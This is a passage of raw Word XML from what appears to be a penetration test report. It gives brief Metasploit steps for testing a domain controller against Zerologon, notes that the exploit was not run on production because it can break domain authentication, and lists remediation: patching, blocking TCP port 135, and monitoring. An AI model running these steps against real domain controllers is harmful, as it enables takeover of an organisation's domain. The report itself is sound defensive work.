          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ause significant downtime to business systems, disrupting productivity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0CBF026E" w14:textId="7B924CC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735DCF" w:rsidP="0D325B6E" w:rsidRDefault="4A735DCF" w14:paraId="739554D5" w14:textId="352B7B9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735DC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00FFE60" w:rsidP="0D325B6E" w:rsidRDefault="500FFE60" w14:paraId="16D72AE2" w14:textId="4EBA2E82">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0FFE60">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Launch Metasploit - ms</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fconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5615E8C4" w:rsidP="0D325B6E" w:rsidRDefault="5615E8C4" w14:paraId="1454201B" w14:textId="2F38D31A">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15E8C4">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 xml:space="preserve">Search for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Zerologon</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 xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="71BF7B66">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 xml:space="preserve">search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zerologon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6D99CFBC" w:rsidP="0D325B6E" w:rsidRDefault="6D99CFBC" w14:paraId="562AE6FD" w14:textId="7B40FA13">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D99CFBC">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3F28084B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Load Exploit Module – use 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="30672964" w:rsidP="0D325B6E" w:rsidRDefault="30672964" w14:paraId="24E440DE" w14:textId="61181CCE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>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0672964">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C741143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Set LHOST to the attack machine’s IP and set RHOSTS to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C741143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Domain Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C7411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C741143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that is being attacked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5EF10B39" w:rsidP="0D325B6E" w:rsidRDefault="5EF10B39" w14:paraId="776573B2" w14:textId="09C1B527">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>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EF10B39">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C741143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run the exploit - run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="735F7671" w:rsidP="0D325B6E" w:rsidRDefault="735F7671" w14:paraId="05C2C4A6" w14:textId="21B70FC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 xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="734597D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As this penetration test was run against the live production environment, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="734597D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 xml:space="preserve"> did not explo</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it</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th</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 xml:space="preserve">e </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Ze</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ro</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og</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on</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="735F7671">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability, as this attack is known to </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cause harm to the production environm</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en</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 b</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y </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mo</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di</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yi</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ng</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6D118A6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2F5E9F84">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omain </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5F51D1F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Controller’s machine account</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="590AD190">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 to</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4C78B57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B009ED0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a blank </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="68CEDD47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="543BA5E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 xml:space="preserve">Successful </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exploitatio</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 xml:space="preserve"> of th</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3C0C29D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s attack</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="543BA5E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6E50B85">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">may cause authentication issues to occur within the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="46E50B85">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>domain</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 xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2B658630">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9471649">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">other </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pote</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tial</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7853799">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to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52658D5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lo</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52658D5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52658D5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in to the Domain Controller’s machine account</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="46E50B85">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7CB1B79B" w14:textId="4399A85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735DCF" w:rsidP="0D325B6E" w:rsidRDefault="4A735DCF" w14:paraId="5685AB88" w14:textId="28A8DC6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735DC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D73A4B0" w:rsidP="0D325B6E" w:rsidRDefault="0D73A4B0" w14:paraId="3B5FD003" w14:textId="2D8FECBC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0D73A4B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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D73A4B0" w:rsidP="0D325B6E" w:rsidRDefault="0D73A4B0" w14:paraId="456B7566" w14:textId="261FE414">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Apply the Microsoft security </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="640BBB28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>updates releas</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="640BBB28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ed after </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="640BBB28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>February 2021</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4760F98E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</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nd </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="16956C15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="16956C15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> them</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="343BAD20">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on</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all vulnerable </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="01EB2F8F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Domain Controllers</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as soon as possible</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65737A79">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against</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65737A79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65737A79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Zero</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65737A79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logon</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65737A79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</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This patch requires an update and restart to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5EDA6B34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>machine and may not be applicable if</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D73A4B0">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0D73A4B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a critical system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05AB5257" w:rsidP="0D325B6E" w:rsidRDefault="05AB5257" w14:paraId="403D19B2" w14:textId="244E6794">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Block</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0872C40B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> inbound traffic </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="14DAFEED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on</w:t>
      </w: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 xml:space="preserve"> TCP port 135 on the network </w:t>
      </w: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irewall</w:t>
      </w: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5AB5257">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="619DE3B9">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619DE3B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onitor</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="01C6BA00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mali</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="01C6BA00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cious activity in the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4914E469">
        <w:rPr>
